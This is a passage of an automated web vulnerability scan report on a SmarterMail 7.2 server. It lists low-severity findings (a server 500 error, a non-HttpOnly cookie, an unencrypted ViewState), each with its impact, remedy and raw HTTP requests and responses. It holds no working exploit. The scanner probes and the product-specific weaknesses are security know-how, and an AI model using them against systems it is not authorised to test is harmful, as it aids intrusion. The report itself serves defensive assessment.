<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuColumns' style='z-index: 1001'><a class='hmA' href='#'>Visible Fields</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul>
</div>
<div class='hmClear'><!-- --></div>

</div>
<div id="FilterBar" class="FilterBar" style="visibility: hidden">

<div id="FilterBarContents" class="RoundedSearchBox">
<div class="RoundedSearchBoxLeft">
<div class="RoundedSearchBoxRight">
<label for="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBoxLabel" style="display: none">Search...</label>
<div id="ctl00_Split_LP_ctl01_searchBarContacts_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnGo',''); return false;"><span class="BBInner"></span></a></div>
<input name="ctl00$Split$LP$ctl01$searchBarContacts$FilterBox" type="text" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" autocomplete="off" />
<div id="ctl00_Split_LP_ctl01_searchBarContacts_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnClear',''); return false;"><span class="BBInner"></span></a></div>
</div>
</div>
</div>


<a id="ctl00_Split_LP_ctl01_lnkFilter" href="javascript:__doPostBack('ctl00$Split$LP$ctl01$lnkFilter','')"></a>
</div>

<div id="LeftScrollable" class="ContentDiv">
<span id="ctl00_Split_LP_ctl01_HyperMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_Split_LP_ctl01_ctl00' name='ctl00$Split$LP$ctl01$ctl00' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_ctl00_hm0' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_ctl00_hm1' style='z-index: 800'><a class='hmA' href='#'>Send Email</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

<table id="ctl00_Split_LP_ctl01_grdContactsOuterTable" class="HyperGridOuter" style="border-collapse:collapse;border-spacing:0px;width:100%;">
<tr>
<td class="HyperGridContentCell" id="ctl00_Split_LP_ctl01_grdContactsContentCell" style="padding:0;vertical-align:top;" >
<div class="HyperGridWrapper" id="ctl00_Split_LP_ctl01_grdContacts" style="padding-right:0;">
<div id="ctl00_Split_LP_ctl01_grdContactsHeaderWrapper" style="display:none">
<table id="ctl00_Split_LP_ctl01_grdContactsHeaderTable" class="HyperGrid" style="table-layout: fixed">
<colgroup><col /><col /></colgroup>
<thead>
<tr><th scope="col" class="showsel lc nw CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_Split_LP_ctl01_grdContactsCheckAll" name="ctl00$Split$LP$ctl01$grdContactsCheckAll" /></th><th scope="col" class="rc al nw BoldFirstMultiLine" style="overflow: hidden">Contact</th></tr>
</thead>
</table>
</div>
<div id="ctl00_Split_LP_ctl01_grdContactsContentWrapper" class="HyperGridContentWrapper" style="overflow-y:hidden;overflow-x:visible;">
<table id="ctl00_Split_LP_ctl01_grdContactsContentTable" class="HyperGrid">
<colgroup><col /><col /></colgroup>
</table>
</div>
</div>
</td>
</tr>
</table>
<div id="ctl00_Split_LP_ctl01_grdContactsScroller" class="HyperGridScroller" style="visibility:hidden;position:relative;width:22px;overflow-y:scroll;" ><div id="ctl00_Split_LP_ctl01_grdContactsInnerScroller" style="height: 10px"></div></div>
<div style="position:absolute;top:-100px;width:0;height:0;">
<input id="ctl00_Split_LP_ctl01_grdContactsFocuser" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsSelectedIDs" name="ctl00$Split$LP$ctl01$grdContactsSelectedIDs" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsScrollPos" name="ctl00$Split$LP$ctl01$grdContactsScrollPos" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
</div>
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
<div class="FooterSummary">
<span id="ctl00_Split_LP_ctl01_lblCount">0 contact(s)</span>
</div>
</div>

|0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||208|hiddenField|__VIEWSTATE|/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBSBjdGwwMCRTcGxpdCRMUCRjdGwwMSRncmRDb250YWN0cw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGT8XpaY8h6fxawd0JLTm1yS3kkTOg==|24|asyncPostBackControlIDs||ctl00$Split$LP$lnkUpdate|0|postBackControlIDs|||34|updatePanelIDs||tctl00$Split$LP$StyledUpdatePanel1|0|childUpdatePanelIDs|||33|panelsToRefreshIDs||ctl00$Split$LP$StyledUpdatePanel1|2|asyncPostBackTimeout||90|12|formAction||default.aspx|1|pageTitle||3|170|scriptBlock|ScriptPath|/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstCjdZSr2uDpU6O2NTF1ISnP_zYh5FLRQP7rbZ36OXJ90&t=ffffffff8fb8c655|796|scriptBlock|ScriptContentWithTags|{"text":"\r\n var startup = function() {\r\n $(\"#FilterBarContents\").magicLabels();\r\n\r\n $(\"#ctl00_Split_LP_ctl01_searchBarContacts_FilterBox\&q..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary, and the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection, or could be the result of poor coding practices.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors; this should be a generic practice that does not disclose further information upon an error. All errors should be handled server-side only.

- /Main/FileStorageUpload.ashx

/Main/FileStorageUpload.ashx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/FileStorageUpload.ashx?uploadValidationToken=def234bfb6a5429880f5ef74e1fe9..

Request

GET /Main/FileStorageUpload.ashx?uploadValidationToken=def234bfb6a5429880f5ef74e1fe9c71&pathField=Root+Folder%5c&userField=dummy&domainField=hoytllc.com HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:34:38 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close




</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p>&nbsp;</p><hr>

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Runtime Error</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>

<b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a &lt;customErrors&gt; tag within a &quot;web.config&quot; configuration file located in the root directory of the current web application. This &lt;customErrors&gt; tag should then have its &quot;mode&quot; attribute set to &quot;Off&quot;.<br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
&lt;system.web&gt;
&lt;customErrors mode=&quot;Off&quot;/&gt;
&lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

</td>
</tr>
</table>

<br>

<b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the &quot;defaultRedirect&quot; attribute of the application's &lt;customErrors&gt; configuration tag to point to a custom error page URL.<br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

&lt;!-- Web.Config Configuration File --&gt;

&lt;configuration&gt;
&lt;system.web&gt;
&lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
&lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

</td>
</tr>
</table>

<br>

</body>
</html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after these changes, JavaScript code will not be able to read the cookies).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not by itself protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /Login.aspx

/Login.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Login.aspx

Identified Cookie

SelectedLanguage

Request

POST /Login.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 862
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTARGUMENT=1&__EVENTTARGET=1&__LASTFOCUS=1&__VIEWSTATE=%2fwEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg%2fcD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ%2fxDsa2Ruq8vSjNI7VPml35tg%3d%3d&ctl00$BPH$btnEnterClick=1&ctl00$BPH$LanguageList=1&ctl00$MPH$chkAutoLogin=1&ctl00$MPH$txtPassword=1&ctl00$MPH$txtUserName=1

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:34:22 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=en; expires=Sat, 03-Oct-2020 00:34:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3334
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">

<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">

</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">

<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="1" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" checked="checked" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>

</div>
<div class="LoginButtons">

<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>


<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>



</div>



<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities, and, if your application stores application-critical information in the ViewState, that information will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page-based protection, place the following directive at the top of the affected page.
<%@ Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application in web.config. Apply the following configuration to your application's web.config file (element names in web.config are case-sensitive, and the pages element must be closed).
<system.web>
	<pages viewStateEncryptionMode="Always" />
</system.web>

Remedy References

- /

/

http://vulnerable.smartermail.7.x.host:9998/

ViewState Version

.NET Framework 2.x

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">

<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">

</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">

<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>

</div>
<div class="LoginButtons">

<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>


<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>



</div>



<script type="text/javascript">
//<![CDATA[
